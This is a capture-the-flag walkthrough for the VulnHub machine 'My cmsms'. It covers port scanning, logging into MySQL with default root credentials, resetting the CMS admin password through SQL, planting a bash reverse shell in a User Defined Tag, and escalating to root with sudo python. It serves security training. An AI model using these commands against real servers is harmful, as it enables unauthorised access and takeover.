In this post, we are solving another vulnhub machine My cmsms. This machine is made by Pankaj Verma. and Difficulty of this VM Easy to Intermediate. our goal is to get the root flag present in /root directory. you can download here the VM.
This VM has been designed by Pankaj Verma. this box contains some interesting things about CMS. It has been designed in a way to enhance user’s skills while playing with some privileges. Its a quite forward box but stay aware of rabbit holes.
Let’s start with netdiscover discovering our target IP address
now we have target ip address 192.168.1.3 our next step is enumerating open ports and running services using parameter -A
nmap -A 192.168.1.3
After scanning target IP address we have 3 open ports target machine 22/SSH, 80HTTP apache httpd server running and 3306 MySql
we start enumeration by exploring the IP address, but we couldn’t found any useful things, then we move the next step enumerating ports 3306 MySQL service. after try command password we log in with mysql root user as an password root.
mysql -h 192.168.1.3 -u root -p show databases; use cmsms_db;
we see four databases I choose cmsms_db here we found cms made simple database and tables let’s dump the username, email address, and password. and in the cms_users table, we found one user entry, using the MySQL query command we can update a new password for the admin user.
select username,email,password from cms_users; update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin';
our new password is updated our next step is navigating the login URL and we can successfully login with the admin username and hackNos password.
- USERNAME: admin
- PASSWORD: hackNos
After login with cms panel we go to Extensions -> User Defined Tags now click the edit button user agent and replace the user agent code with bash reverse shell. and here we can execute any Linux command.
system("bash -c 'bash -i >& /dev/tcp/192.168.1.2/4545 0>&1'");
Let’s move the next step starting our netcat payload listener and then we run the curl command execute our payload.
nc -lvp 4545 curl -vv http://192.168.1.3/index.php?page=user-defined-tags
Now we have reverse shell target machine let’s enumerate the machine and find the weakness files and services. and we discover an . extension hidden file apache2 home directory. we open the file and we see an base64 text.
ls | head -n 2 cd admin ls -la | head -n 5 cat .htpasswd
copy the text and decode with Linux inbuilt base64 tool using parameter -d and again we found another base32 string using the base32.
hmm, we can discover armour user password let’s try to log in with armour user and [email protected] password.
su armour id python3 -c 'import pty;pty.spawn("/bin/bash")'
for the privilege escalation we run the sudo -l command and we see we can run the python command with sudo permission without root user password.
wisudo -l sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")' id
now we have root shell target machine. let’s run the cd /root command go to the root directory. our root flag our challenge is completed by reading proof.txt.
cd /root ls cat proof.txt
Sumo Vulnhub Walkthrough link